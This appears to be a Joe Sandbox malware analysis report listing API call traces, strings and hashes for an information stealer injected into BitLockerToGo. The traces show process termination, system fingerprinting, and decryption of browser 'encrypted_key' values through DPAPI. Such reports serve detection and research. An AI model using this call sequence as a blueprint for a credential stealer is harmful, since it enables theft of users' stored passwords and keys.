                                                                                                                                                                                                                                                                                                                    • API String ID: 3225020163-4244082812
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 95895749219a675ebaea0b4850e380143b32df8ae3e8fb2ec1665bb1a5e26d95
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 21e30136417b67d35d10d67470701df07a0d643bd1691ae336de6b598e20be34
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 95895749219a675ebaea0b4850e380143b32df8ae3e8fb2ec1665bb1a5e26d95
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02F0D075680308FFEB205B91DC0AFAA7A69EB84B05F500065B701E6191DBB15A51D654
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 008F451F
                                                                                                                                                                                                                                                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 008F4533
                                                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008F4559
                                                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 008F4568
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 008F456F
                                                                                                                                                                                                                                                                                                                    • Process32Next.KERNEL32(?,00000128), ref: 008F4582
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 008F4592
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2696918072-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: a09f5507d3189b69af7cade93a9e804ccbebe9b091c6416087c5690b92482756
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 54e4cfc023683de3d78c3700e833897558bd4a661b0b10b5e984b7a8203972ab
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a09f5507d3189b69af7cade93a9e804ccbebe9b091c6416087c5690b92482756
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC11FA7190122DABEB31AF64DD49BEA7AB5FF08701F1000A6E605E7190DB709B51CE55
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,008F5BD2,Windows: ,009178E0), ref: 008F27A0
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008F27A7
                                                                                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,009178C8,?,?,?,008F5BD2,Windows: ,009178E0), ref: 008F27D5
                                                                                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(009178C8,00000000,00000000,00000000,000000FF,?,?,?,008F5BD2,Windows: ,009178E0), ref: 008F27F1
                                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(009178C8,?,?,?,008F5BD2,Windows: ,009178E0), ref: 008F27FA
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                                    • String ID: Windows 11
                                                                                                                                                                                                                                                                                                                    • API String ID: 3225020163-2517555085
                                                                                                                                                                                                                                                                                                                    • Opcode ID: a4e66dce203f7d7ca8cdab6990024a43bafe63e856d5adeb50ee01c4b2973480
                                                                                                                                                                                                                                                                                                                    • Instruction ID: e89774f0760fb788936471a297d48eb25ef1191196c7079927878102897fbfc4
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4e66dce203f7d7ca8cdab6990024a43bafe63e856d5adeb50ee01c4b2973480
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21F04F75640308FFEB209BA4DC0AFBA7A79FB44B41F100024BB01E61A4DBB09952D751
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,008F2877,008F27B4,?,?,?,008F5BD2,Windows: ,009178E0), ref: 008F2819
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008F2820
                                                                                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,009178C8,?,?,?,008F2877,008F27B4,?,?,?,008F5BD2,Windows: ,009178E0), ref: 008F283E
                                                                                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(009178C8,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,008F2877,008F27B4,?,?,?,008F5BD2,Windows: ), ref: 008F2859
                                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(009178C8,?,?,?,008F2877,008F27B4,?,?,?,008F5BD2,Windows: ,009178E0), ref: 008F2862
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                                    • String ID: CurrentBuildNumber
                                                                                                                                                                                                                                                                                                                    • API String ID: 3225020163-1022791448
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8c6c51b0eabec638521da1df91450cec36c9e6225f4bbd9df1b645637d62a99d
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 904333b144c1d778718fefbc022c12a24d75895dc06b5d6b56e30e87bd02a310
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c6c51b0eabec638521da1df91450cec36c9e6225f4bbd9df1b645637d62a99d
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1F01D75680208BBEB205BA0DC0AFAA7A79EB44B45F100024F701E6091DFB05A52D654
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008F73DF
                                                                                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 008F73FF
                                                                                                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 008F7425
                                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 008F7431
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 008F7460
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?), ref: 008F7473
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcat$CloseOpenQueryValue_memset
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3891774339-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9c776dc1329dd29dc4a35e167f2eda42e82c31ffe84c07fa3cca33779aed3307
                                                                                                                                                                                                                                                                                                                    • Instruction ID: b1ac8f23c136caec07cd34b09e1d6a95fe8810e7a1c5b81d7f06eb78a64b8200
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c776dc1329dd29dc4a35e167f2eda42e82c31ffe84c07fa3cca33779aed3307
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2416D7188001DAFDF25EB68DC4AEE97779FB18304F5004A5A608E31A1DE705EDACF91
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E9163
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,008EF752,?,?,?), ref: 008E917A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,008EF752,?,?,?), ref: 008E9191
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E91A8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CloseHandle.KERNEL32(?,?,?,?,?,008EF752,?,?,?), ref: 008E91D0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3A7B: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,008F8680,?), ref: 008F3A93
                                                                                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?), ref: 008E93EE
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E91FF: LocalAlloc.KERNEL32(00000040,?,00000001,?,?,?,?,008E665F,00000000,?), ref: 008E9239
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E92A6: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,008E9456), ref: 008E92C9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E92A6: LocalAlloc.KERNEL32(00000040,008E9456,?,?,008E9456,?,008EDC56,?,?,?,?,?,?), ref: 008E92DD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E92A6: LocalFree.KERNEL32(?,?,?,008E9456,?,008EDC56,?,?,?,?,?,?), ref: 008E9302
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000001,?,?,?,?,?,?), ref: 008E947F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: CreateThread.KERNEL32(00000000,00000000,008F8B15,?,00000000,00000000), ref: 008F8C85
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 008F8C8D
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Local$Alloc$File$Createlstrcpylstrlen$CloseCryptDataFreeHandleObjectReadSingleSizeThreadUnprotectWaitlstrcat
                                                                                                                                                                                                                                                                                                                    • String ID: $"encrypted_key":"$DPAPI$_key.txt
                                                                                                                                                                                                                                                                                                                    • API String ID: 2040183763-3468172165
                                                                                                                                                                                                                                                                                                                    • Opcode ID: a1bf3f98b856df621971467e7b4bf52c2518e1ee58fdbe2fd49949714ea1872b
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 50341513e3caa655a78114b41e3961a29c037ab3f480f5be01f60110fc45b828
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1bf3f98b856df621971467e7b4bf52c2518e1ee58fdbe2fd49949714ea1872b
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C316D36A0014DBBDF10EBAADC829DD7774FF06364F204164F944E6291DBB09E46CAA5
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E9163
                                                                                                                                                                                                                                                                                                                    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,008EF752,?,?,?), ref: 008E917A
                                                                                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,008EF752,?,?,?), ref: 008E9191
                                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E91A8
                                                                                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(008EFCF9,?,?,?,?,008EF752,?,?,?), ref: 008E91C7
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,008EF752,?,?,?), ref: 008E91D0
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2311089104-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: e6d4d2ad323e0c55519256a8ab66e0c5b022fca9537ccd83974731a60bb81604
                                                                                                                                                                                                                                                                                                                    • Instruction ID: dc04381f7880e4a44a63f35d3ce6284ea6d368da8c4a86ed798da16e8cd7a719
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6d4d2ad323e0c55519256a8ab66e0c5b022fca9537ccd83974731a60bb81604
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A114974900245FBDB259FA6CC48EAEBBB9FB85740F200548F981E3150D7B49A41DB11
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 008E109A
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008E10C0
                                                                                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 008E10D6
                                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,008F9CAB), ref: 008E10F0
                                                                                                                                                                                                                                                                                                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 008E10F7
                                                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 008E1102
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1859398019-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 174cb06f2eecbb5e520f207fcb0198c9b2b6e52e9d5df00719987b239dc245f7
                                                                                                                                                                                                                                                                                                                    • Instruction ID: aefd3ef68151f69a0ef1df02275a7fbd498f0572bd7cc2f2173e7f0eb1c82c50
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 174cb06f2eecbb5e520f207fcb0198c9b2b6e52e9d5df00719987b239dc245f7
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6CF0FC75B8579077E62012762C5EFFB2A5CEB46F56F204014F308EB1D0D6619984E674
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 008F7BD5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 008F3A59
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 008F7BF2
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 008F7C11
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 008F7C25
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?), ref: 008F7C38
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 008F7C4C
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?), ref: 008F7C5F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F39EE: GetFileAttributesA.KERNEL32(?,?,?,008EEA72,?,?,?), ref: 008F39F5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F785A: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 008F787F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F785A: RtlAllocateHeap.NTDLL(00000000), ref: 008F7886
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F785A: wsprintfA.USER32 ref: 008F789F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F785A: FindFirstFileA.KERNEL32(?,?), ref: 008F78B6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F785A: StrCmpCA.SHLWAPI(?,00917AD8), ref: 008F78D7
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F785A: StrCmpCA.SHLWAPI(?,00917ADC), ref: 008F78F1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F785A: wsprintfA.USER32 ref: 008F7918
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F785A: CopyFileA.KERNEL32(?,?,00000001), ref: 008F79D5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F785A: DeleteFileA.KERNEL32(?), ref: 008F79F8
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcat$File$Heapwsprintf$AllocateAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3709078413-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 767a59386f8cb8acb26b9478434e1db05326316e2e632ca0ea0f0e4ec4d9d7df
                                                                                                                                                                                                                                                                                                                    • Instruction ID: ce4a7c123a84b3ffc87cd66b9d75f1b011a83a7ebb0104db87a3d7e580b97e43
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 767a59386f8cb8acb26b9478434e1db05326316e2e632ca0ea0f0e4ec4d9d7df
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA51E7B5A0011C9BCB64DB74CC95ADDB7B8FB4C311F4048E6EB09E3254EA70AB998F54
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008F332A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F421B: malloc.MSVCRT ref: 008F4220
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F421B: strncpy.MSVCRT ref: 008F4231
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 008F3352
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00917E68), ref: 008F336F
                                                                                                                                                                                                                                                                                                                    • GetCurrentHwProfileA.ADVAPI32(?), ref: 008F32FB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                                                                                                                                                                                                                                    • String ID: Unknown
                                                                                                                                                                                                                                                                                                                    • API String ID: 2781187439-1654365787
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 79b1491d7ca7757120c91845f223300ddf6dc05610f6ef1a767f52679a5d496c
                                                                                                                                                                                                                                                                                                                    • Instruction ID: d68b6cc9df1c42d790cb81f430ff8369d5170ba8cc5d12d7fa85a9a26876e102
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79b1491d7ca7757120c91845f223300ddf6dc05610f6ef1a767f52679a5d496c
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09115E71A4421CABDB20EB78DC46FDDB3B8FB04700F0004E1B649E7261DAB4AF848B55
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00917950,Display Resolution: ,00917934,00000000,User Name: ,00917924,00000000,Computer Name: ,00917910,AV: ,00917904,Install Date: ), ref: 008F2D8D
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008F2D94
                                                                                                                                                                                                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 008F2DB0
                                                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 008F2DD6
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                                                                                                                    • String ID: %d MB
                                                                                                                                                                                                                                                                                                                    • API String ID: 2922868504-2651807785
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ef205e2b94287e1597f8311687a7c2dfd835ed904d295f156176b6a352e7cd42
                                                                                                                                                                                                                                                                                                                    • Instruction ID: cc66147af98f6e4cfd3f5265df08439b6816ba45ec8b7aaa3726b0d58b570760
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef205e2b94287e1597f8311687a7c2dfd835ed904d295f156176b6a352e7cd42
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B0186B1A4020CABEB14EFB8DC45EFEB7B8FF04341F540429FA02E7190DA709A028765
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6C98C947
                                                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C98C969
                                                                                                                                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6C98C9A9
                                                                                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C98C9C8
                                                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C98C9E2
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 4191843772-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 84c5bfda3c6292df1de72dde4d266529e929f3c1f97298657466e5288d804581
                                                                                                                                                                                                                                                                                                                    • Instruction ID: af2cd4140d1f6ca2312aa1d56a49d15fff7420ee7c03c09785c3698cf728fd2d
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84c5bfda3c6292df1de72dde4d266529e929f3c1f97298657466e5288d804581
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F321F932746214ABDB04AE64EC84BAE73B9AF46704F60065AF957A7B40DB71DC04C7A1
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A10
                                                                                                                                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A16
                                                                                                                                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A1C
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(000000FF,00000000,?), ref: 008E4A2E
                                                                                                                                                                                                                                                                                                                    • InternetCrackUrlA.WININET(000000FF,00000000), ref: 008E4A36
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1274457161-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 11aaefa02c9ce1682d44b56240b1661eff0805efa4c93f5e3242c5be4373cab6
                                                                                                                                                                                                                                                                                                                    • Instruction ID: e901d5782e2a5cecc589ff8420d19d2de71329183311474a799c3c848aa59fc9
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11aaefa02c9ce1682d44b56240b1661eff0805efa4c93f5e3242c5be4373cab6
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19010932D00218ABCB149BA9DC45ADEBFB8EF55330F108216E925E72A1DA746602CB94
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,008F5F8F,Processor: ,[Hardware],00917990,00000000,TimeZone: ,00917980,00000000,Local Time: ,0091796C), ref: 008F2BC1
